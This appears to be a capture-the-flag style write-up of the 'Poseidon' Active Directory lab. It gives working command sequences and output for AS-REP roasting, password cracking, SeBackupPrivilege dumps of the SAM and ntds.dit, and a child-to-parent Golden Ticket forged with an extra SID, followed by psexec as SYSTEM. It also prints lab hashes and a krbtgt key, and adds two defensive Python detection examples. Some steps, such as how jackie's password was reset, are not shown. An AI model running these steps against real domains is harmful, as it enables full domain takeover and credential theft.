
Poseidon

Network

IP               DOMAIN NAME       NAME   NOTES  ORDER
192.168.166.161  poseidon.yzx      DC01   OWNED  3
192.168.166.162  sub.poseidon.yzx  DC02   OWNED  1
192.168.166.163  -                 GYOZA  OWNED  2

Objectives

We have been tasked to conduct a penetration test on the network of poseidon.yzx. Several vulnerabilities and misconfigurations are present in the Active Directory environment, which an attacker can leverage to gain access to all workstations. The main objective is to obtain access to the Domain Controller.

The public subnet of the network resides in the 192.168.xx.0/24 range, where the xx of the third octet can be found under the IP ADDRESS field in the control panel.


Credentials

  • chen:freedom
  • lisa:LisaWayToGo456

DC01

Enumeration

PORT      SERVICE           VERSION          NOTES
53/tcp    domain            Simple DNS Plus  -
88/tcp    kerberos-sec      -                KERBEROS
135/tcp   msrpc             -                MSRPC
139/tcp   netbios-ssn       -                SMB
389/tcp   ldap              -                LDAP
445/tcp   microsoft-ds      -                SMB
464/tcp   kpasswd5          -                -
593/tcp   http-rpc-epmap    -                MSRPC
636/tcp   ldapssl           -                LDAP
3268/tcp  globalcatLDAP     -                LDAP
3269/tcp  globalcatLDAPssl  -                LDAP
5985/tcp  wsman             -                OMI
9389/tcp  adws              -                -

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -p- -oN alltcp_ports1.txt 192.168.166.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:19 CET
Nmap scan report for 192.168.166.161
Host is up (0.065s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49699/tcp open  unknown
49952/tcp open  unknown


┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49665,49666,49668,49669,49670,49699,49952 -oN alltcp1.txt 192.168.166.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:24 CET
Nmap scan report for 192.168.166.161
Host is up (0.067s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-03 09:24:55Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: poseidon.yzx, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: POSEIDON)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: poseidon.yzx, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49699/tcp open  msrpc        Microsoft Windows RPC
49952/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: dc01
|   NetBIOS computer name: DC01\x00
|   Domain name: poseidon.yzx
|   Forest name: poseidon.yzx
|   FQDN: dc01.poseidon.yzx
|_  System time: 2025-01-03T09:25:48+00:00
|_clock-skew: mean: 0s, deviation: 2s, median: 0s
| smb2-time: 
|   date: 2025-01-03T09:25:45
|_  start_date: 2024-12-11T20:26:21
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Exploit and Privilege Escalation

From the machine 192.168.166.162 I extracted all the hashes of the sub.poseidon.yzx domain. Among them was also the krbtgt hash.

PowerShell
krbtgt:aes256-cts-hmac-sha1-96:b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2

With this hash we can create a Golden Ticket.

I need the following data:

  • SID of the source domain, in this case sub.poseidon.yzx
  • SID of the destination domain, in this case poseidon.yzx
  • krbtgt hash
  • a valid, existing user on the source domain, in this case Administrator

  • Retrieve the SID of the source (child) domain:

    PowerShell
    mimikatz # privilege::debug
    Privilege '20' OK
    
    mimikatz # lsadump::lsa /patch
    Domain : sub / S-1-5-21-4168247447-1722543658-2110108262
    

  • Retrieve the SID of the destination (parent) domain:

    PowerShell
    mimikatz # privilege::debug
    Privilege '20' OK
    
    mimikatz # sekurlsa::trust /patch
    
    Domain: POSEIDON.YZX (POSEIDON / S-1-5-21-1190331060-1711709193-932631991)
    

    Warning

    Since this is the Enterprise (forest root) domain, the value 519 must be appended to the end of the SID to obtain the full SID. More info here.

  • Set the entries in the /etc/hosts file, in this case:

    Bash
    192.168.166.161 poseidon.yzx dc01.poseidon.yzx
    192.168.166.162 sub.poseidon.yzx dc02.sub.poseidon.yzx
    
  • Run on Kali:

    Bash
    ┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
    └─$ impacket-ticketer -aesKey b2304e451b53dc5e71c08ddd0fd06a3803d8f14243020fd46c80ad44ec75d2a2 \
    -domain-sid S-1-5-21-4168247447-1722543658-2110108262 \
    -domain sub.poseidon.yzx \
    -extra-sid S-1-5-21-1190331060-1711709193-932631991-519 \
    administrator -extra-pac
    

    And I get:

    Bash
    [*] Creating basic skeleton ticket and PAC Infos
    /usr/share/doc/python3-impacket/examples/ticketer.py:139: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
      aTime = timegm(datetime.datetime.utcnow().timetuple())
    [*] Customizing ticket for sub.poseidon.yzx/administrator
    /usr/share/doc/python3-impacket/examples/ticketer.py:598: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
      ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
    /usr/share/doc/python3-impacket/examples/ticketer.py:716: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
      encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
    /usr/share/doc/python3-impacket/examples/ticketer.py:717: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
      encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
    [*]     PAC_LOGON_INFO
    [*]     PAC_CLIENT_INFO_TYPE
    [*]     EncTicketPart
    /usr/share/doc/python3-impacket/examples/ticketer.py:841: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
      encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
    [*]     EncAsRepPart
    [*] Signing/Encrypting final ticket
    [*]     PAC_SERVER_CHECKSUM
    [*]     PAC_PRIVSVR_CHECKSUM
    [*]     EncTicketPart
    [*]     EncASRepPart
    [*] Saving ticket in administrator.ccache
    
  • Then I export the KRB5CCNAME variable:

    Bash
    ┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
    └─$  export KRB5CCNAME=/home/momphucker/Desktop/offsec_/machines/Poseidon/administrator.ccache
    
  • And finally I run impacket-psexec 'sub.poseidon.yzx/administrator@dc01.poseidon.yzx' -k -no-pass:

    Bash
    ┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
    └─$ impacket-psexec 'sub.poseidon.yzx/administrator@dc01.poseidon.yzx' -k -no-pass
    Impacket v0.12.0.dev1 - Copyright 2023 Fortra
    
    [*] Requesting shares on dc01.poseidon.yzx.....
    [*] Found writable share ADMIN$
    [*] Uploading file OejOaaxY.exe
    [*] Opening SVCManager on dc01.poseidon.yzx.....
    [*] Creating service SrrZ on dc01.poseidon.yzx.....
    [*] Starting service SrrZ.....
    [!] Press help for extra shell commands
    Microsoft Windows [Version 10.0.14393]
    (c) 2016 Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32> whoami
    nt authority\system
    
    C:\Windows\system32> ipconfig
    
    Windows IP Configuration
    
    
    Ethernet adapter Ethernet0 2:
    
       Connection-specific DNS Suffix  . : 
       IPv4 Address. . . . . . . . . . . : 192.168.166.161
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 192.168.166.254
    
    Tunnel adapter Reusable ISATAP Interface {3A609699-C2B5-4DB1-A8C3-D06AE78AA003}:
    
       Media State . . . . . . . . . . . : Media disconnected
       Connection-specific DNS Suffix  . : 
    
    C:\Windows\system32> 
    

I finish by retrieving the proof.txt flag:

[screenshot: 001.png]
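The -519 appended above is the RID of Enterprise Admins attached to the parent domain's SID and carried in the forged ticket's ExtraSids. As an added example that is not part of the write-up, the Python below models SID filtering (quarantine) on a trust, which drops every SID that does not belong to the trusted domain; forest and external trusts apply it by default, while the parent-child trust inside one forest used here does not, which is why DC01 honours the injected SID. The two domain SIDs are the ones recovered with mimikatz above; the user RID 500 in the sample PAC is an assumption.

```python
"""Added example (not from the write-up): what SID filtering on a trust would do
to the extra SID injected into the child-domain Golden Ticket above.
Domain SIDs are the two recovered with mimikatz in the write-up."""
import re

CHILD_SID = "S-1-5-21-4168247447-1722543658-2110108262"   # sub.poseidon.yzx
PARENT_SID = "S-1-5-21-1190331060-1711709193-932631991"   # poseidon.yzx (forest root)

# Well-known RIDs of privileged principals. Group membership is decided by
# SID, so a foreign "<domain>-519" in the PAC is enough for a DC of that
# domain to treat the caller as an Enterprise Admin.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    502: "krbtgt",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+")


def split_sid(sid):
    """Split 'S-1-5-21-a-b-c[-rid]' into (domain_sid, rid or None)."""
    m = DOMAIN_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not an NT domain SID: {sid}")
    domain = m.group(0)
    rest = sid[len(domain):]
    if rest == "":
        return domain, None
    if not re.fullmatch(r"-\d+", rest):
        raise ValueError(f"malformed SID: {sid}")
    return domain, int(rest[1:])


def describe(sid):
    """Human label for a SID: owning domain and well-known RID name, if any."""
    domain, rid = split_sid(sid)
    owner = {CHILD_SID: "sub.poseidon.yzx",
             PARENT_SID: "poseidon.yzx"}.get(domain, "unknown domain")
    name = WELL_KNOWN_RIDS.get(rid, f"RID {rid}")
    return f"{owner} / {name}"


def sid_filter(trusted_domain_sid, pac_sids):
    """Model of SID filtering (quarantine) applied by the trusting domain.

    Every SID the ticket carries must come from the trusted domain itself;
    anything else, including the trusting domain's own privileged groups,
    is dropped before authorization. Returns (kept, stripped).
    """
    kept, stripped = [], []
    for sid in pac_sids:
        domain, _ = split_sid(sid)
        (kept if domain == trusted_domain_sid else stripped).append(sid)
    return kept, stripped


if __name__ == "__main__":
    # SIDs a PAC built like the ticketer run above would present to DC01:
    # the forged child-domain administrator (RID 500 assumed) plus the
    # injected ExtraSid. With filtering on the trust, the second one dies.
    pac = [CHILD_SID + "-500", PARENT_SID + "-519"]
    kept, stripped = sid_filter(CHILD_SID, pac)
    for s in pac:
        state = "kept    " if s in kept else "stripped"
        print(state, s, "->", describe(s))
```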


DC02

Enumeration

PORT      SERVICE  VERSION  NOTES
53/tcp    -        -        DNS
88/tcp    -        -        KERBEROS
135/tcp   -        -        MSRPC
139/tcp   -        -        SMB
389/tcp   -        -        LDAP
445/tcp   -        -        SMB
464/tcp   -        -        -
593/tcp   -        -        MSRPC
636/tcp   -        -        LDAP
3268/tcp  -        -        LDAP
3269/tcp  -        -        LDAP
3389/tcp  -        -        RDP
5985/tcp  -        -        OMI
9389/tcp  -        -        -

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -p- -oN alltcp_ports2.txt 192.168.166.162
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:12 CET
Nmap scan report for 192.168.166.162
Host is up (0.065s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49699/tcp open  unknown
50553/tcp open  unknown


┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo nmap -Pn -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49665,49666,49668,49669,49670,49699,50553 -oN alltcp2.txt 192.168.166.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:16 CET
Nmap scan report for 192.168.166.162
Host is up (0.067s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-03 09:16:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: poseidon.yzx, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds  Windows Server 2016 Standard 14393 microsoft-ds (workgroup: sub)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: poseidon.yzx, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: sub
|   NetBIOS_Domain_Name: sub
|   NetBIOS_Computer_Name: DC02
|   DNS_Domain_Name: sub.poseidon.yzx
|   DNS_Computer_Name: dc02.sub.poseidon.yzx
|   DNS_Tree_Name: poseidon.yzx
|   Product_Version: 10.0.14393
|_  System_Time: 2025-01-03T09:17:07+00:00
|_ssl-date: 2025-01-03T09:17:47+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc02.sub.poseidon.yzx
| Not valid before: 2024-09-17T13:21:20
|_Not valid after:  2025-03-19T13:21:20
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
50553/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC02; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: dc02
|   NetBIOS computer name: DC02\x00
|   Domain name: sub.poseidon.yzx
|   Forest name: poseidon.yzx
|   FQDN: dc02.sub.poseidon.yzx
|_  System time: 2025-01-03T09:17:10+00:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
| smb2-time: 
|   date: 2025-01-03T09:17:08
|_  start_date: 2024-12-11T20:55:39
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

On Kerberos I use Kerbrute:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/custscript/kerbrute/dist]
└─$ ./kerbrute_linux_arm64 userenum --dc 192.168.166.162 -d sub.poseidon.yzx /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 01/03/25 - Ronnie Flathers @ropnop

2025/01/03 11:39:03 >  Using KDC(s):
2025/01/03 11:39:03 >   192.168.166.162:88

2025/01/03 11:39:05 >  [+] VALID USERNAME:       jackie@sub.poseidon.yzx
2025/01/03 11:39:05 >  [+] VALID USERNAME:       lisa@sub.poseidon.yzx
2025/01/03 11:39:06 >  [+] chen has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$chen@SUB.POSEIDON.YZX:918f5ec47abb121633a27a92d4e10225$eecf670116cee17c78b0e1a8f98ea7394c791f73435123b827a1b560046c0aab25170bea9dcb8d61e83eb9ae4c7cd70f4417f50b9d63f446cecdfe5b96f9270f3e36f98086dd2b548929c45a7ba0996aa81f2a1ccdf6b4632ba39bc10da8dd9b6248c80177f08839c10ad16b10188f6bd0f73b9c526de29a3c9bd8dbaa362a062b267b2412092f2d209918030638d154f50f6782d12a236c77d3096b76ebd2cc12bf4ca2e5a8ed41b1ae5f224549d69f81a65d5d40090da96426bb0d0061b94d8125275d72bfa4b070621d18b520a761958e6452928d1d69f43ca203bcd53c20d3919ba342ccdbd197b0ae7ae7101889b0110b959437aa37fef5300413683a3372565fc46096a549                           
2025/01/03 11:39:06 >  [+] VALID USERNAME:       chen@sub.poseidon.yzx
2025/01/03 11:39:16 >  [+] VALID USERNAME:       administrator@sub.poseidon.yzx
2025/01/03 11:39:28 >  [+] VALID USERNAME:       Jackie@sub.poseidon.yzx
2025/01/03 11:39:40 >  [+] VALID USERNAME:       poseidon@sub.poseidon.yzx
2025/01/03 11:40:05 >  [+] Chen has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$Chen@SUB.POSEIDON.YZX:782a847d53cb5874a4d53596082869a8$[...]

In this case Kerbrute found type 18 hashes, which cannot be cracked with hashcat or john. So, having retrieved the users with Kerbrute, I retrieve the hashes with impacket.

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ impacket-GetNPUsers sub.poseidon.yzx/ -dc-ip 192.168.166.162 -usersfile users.txt -outputfile hashes.txt 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:163: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$chen@SUB.POSEIDON.YZX:c008ef46ef9a0925de50bea8211dae1f$9d6b304bf616c1b7103fa62572961bf8b56098751258c045933e42fa607cd626686aabb1edac480682cf83238fa6ac25af745e603355cf53602c5ac0001b452b43e3749159791b21bbd14f53c9a18749b4c73eaedd52b796768df5dce6be000fa19e7aebb4ef786cffa53162e1a39b6200795cdd5a86922babdcce327e5d16da9ab8c22e55661e1939cd997623930aed8fe37d5880e72f67bf924feb3f86a3e2d9291ff62cc3d71c7918c768bcc56aab85ca128cbc409a025865b661f0d906b52ea3b0c9c590ed9a1341e2de4fdc129f92c08a35c3e3602a40aaf6a353e43de20e2ac09fc0a64068fbe10c6f477b917463152c90

And I proceed to crack it with john:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ john hashes.txt                                                                                   
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
freedom          ($krb5asrep$23$chen@SUB.POSEIDON.YZX)     
1g 0:00:00:00 DONE 2/3 (2025-01-03 12:19) 14.28g/s 721142p/s 721142c/s 721142C/s 123456..crawford
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Credentials

  • chen:freedom

I use chen's credentials to access the machine 192.168.166.163.
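As an added example, not part of the write-up, the Python below shows what the two AS-REP requests above look like from the defender's side: Kerberos TGT request events (4768) issued with pre-authentication type 0 identify accounts that return a crackable AS-REP, and a request that also received RC4 (etype 0x17), as GetNPUsers asked for here, is the one to treat as an active roast. The log lines are constructed in a simplified key=value form, not real Windows event XML; account names follow the lab, and the 192.168.166.10 client address is made up.

```python
"""Added example (not from the write-up): spot AS-REP roasting in Kerberos
TGT request events and list the accounts that make it possible.
Input is a constructed, simplified key=value rendering of Windows Security
event 4768; user and domain names follow the lab, client IPs are made up."""
import re

RC4_HMAC = 0x17        # etype 23: what GetNPUsers requested; fast to crack offline
AES256 = 0x12          # etype 18: what Kerbrute received
DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit that makes an account roastable

SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=lisa TargetDomainName=SUB.POSEIDON.YZX PreAuthType=2 TicketEncryptionType=0x12 IpAddress=192.168.166.10 Status=0x0
EventID=4768 TargetUserName=chen TargetDomainName=SUB.POSEIDON.YZX PreAuthType=0 TicketEncryptionType=0x12 IpAddress=192.168.45.248 Status=0x0
EventID=4768 TargetUserName=chen TargetDomainName=SUB.POSEIDON.YZX PreAuthType=0 TicketEncryptionType=0x17 IpAddress=192.168.45.248 Status=0x0
EventID=4768 TargetUserName=jackie TargetDomainName=SUB.POSEIDON.YZX PreAuthType=2 TicketEncryptionType=0x17 IpAddress=192.168.166.10 Status=0x0
EventID=4768 TargetUserName=nosuchuser TargetDomainName=SUB.POSEIDON.YZX PreAuthType=- TicketEncryptionType=0xffffffff IpAddress=192.168.45.248 Status=0x6
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value line into a dict with typed numeric fields."""
    ev = dict(FIELD_RE.findall(line))
    pat = ev["PreAuthType"]
    ev["PreAuthType"] = int(pat) if pat.isdigit() else None   # '-' on failures
    ev["TicketEncryptionType"] = int(ev["TicketEncryptionType"], 16)
    ev["Status"] = int(ev["Status"], 16)
    return ev


def detect_asrep_roast(log_text):
    """Return one finding per successful 4768 issued without pre-authentication.

    PreAuthType 0 means the KDC returned an AS-REP for an account that has
    'Do not require Kerberos preauthentication' set, so the reply can be
    cracked offline. Severity is 'high' when the client also obtained RC4
    (the etype 23 case cracked in seconds above) and 'medium' for AES.
    """
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev["EventID"] != "4768" or ev["Status"] != 0:
            continue   # failures (e.g. 0x6, unknown principal) are user enumeration, not roasting
        if ev["PreAuthType"] != 0:
            continue
        etype = ev["TicketEncryptionType"]
        findings.append({
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"],
            "etype": etype,
            "severity": "high" if etype == RC4_HMAC else "medium",
        })
    return findings


def roastable_accounts(uac_by_sam):
    """Hygiene check: accounts carrying DONT_REQ_PREAUTH in userAccountControl.

    uac_by_sam maps sAMAccountName to the integer userAccountControl value
    (as read from the directory); clearing the bit removes the exposure.
    """
    return sorted(sam for sam, uac in uac_by_sam.items() if uac & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    for f in detect_asrep_roast(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['user']} from {f['source']} etype 0x{f['etype']:x}")
    # constructed userAccountControl values: chen has the flag set
    print("roastable:", roastable_accounts({"chen": 0x410200, "lisa": 0x10200}))
```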

Exploit

I log in with Evil-WinRM using jackie's reset credentials:

PowerShell
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ evil-winrm -i 192.168.166.162 -u jackie -p 'Aa.123456!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jackie\Documents>

Privilege Escalation

I check the privileges:

PowerShell
*Evil-WinRM* PS C:\Users\jackie\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

I use the SeBackupPrivilege privilege to make a copy of SAM and SYSTEM to download:

PowerShell
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

I retrieve the hashes:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ sudo pypykatz registry --sam sam system
[sudo] password for momphucker: 
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 6147911c9221199f60a625e5011aafde
============== SAM hive secrets ==============
HBoot Key: 4d5e6433a492e877a9d8db8b2f203d4210101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fea81a19d172de0c445c8072b9a1697:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

I download the ntds.dit file by following this procedure:

I create the file raj.dsh and put the following inside it:

Text Only
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

Finally I run unix2dos raj.dsh and upload the file to the target machine.

On the target machine I follow these steps:

I create the folder C:\Temp if it does not already exist and upload raj.dsh into it. Then I run diskshadow /s raj.dsh followed by robocopy /b z:\windows\ntds . ntds.dit:

PowerShell
cd C:\Temp
upload raj.dsh
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit

I download locally the ntds.dit file copied into the C:\Temp folder.

Finally I extract all the hashes:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ impacket-secretsdump -ntds ntds.dit -system system LOCAL                                                                
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x6147911c9221199f60a625e5011aafde
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 510cae62a7d31edc77934766cf32f0ac
[*] Reading and decrypting hashes from ntds.dit 
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3bcdd818f7ec942ac91aa30d8db71927:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:14f50341e5ace079e432dcb8b402e5e5:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:80f23a248d39b8cb93df3a4a2f4199a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sub$:1103:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
